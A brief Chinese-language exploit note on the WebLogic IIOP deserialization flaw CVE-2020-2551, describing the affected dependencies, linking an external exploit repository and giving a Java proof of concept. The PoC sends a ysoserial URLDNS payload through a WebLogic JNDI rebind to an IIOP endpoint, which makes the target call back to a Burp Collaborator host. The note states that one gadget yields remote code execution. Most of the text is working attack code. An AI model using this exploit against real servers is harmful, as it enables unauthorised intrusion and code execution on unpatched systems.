定位: 是一个反序列化的入口,只需一个 gaget就能 RCE
影响版本: 和 jdk( jdk7u21) jython () 以及底层库(CommonsCollections) 还有补丁级别有关。并且存在其他 gadget利用的可能。
poc:
10.3.6 exp:
https://github.com/Y4er/CVE-2020-2551
poc :
package com;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.util.Hashtable;
import ysoserial.payloads.URLDNS;
class test {
public static void main(String[] args) throws Exception {
URLDNS u = new URLDNS();
Object o = u.getObject("http://local.4inxs7g4bqg41civtrzp1axjpav0jp.burpcollaborator.net");
String rhost = "iiop://127.0.0.1:7001";
Hashtable<String, String> env = new Hashtable<String, String>();
env.put("java.naming.factory.initial", "weblogic.jndi.WLInitialContextFactory");
env.put("java.naming.provider.url", rhost);
Context context = new InitialContext(env);
context.rebind("k4ii" + System.nanoTime(), o);
}
}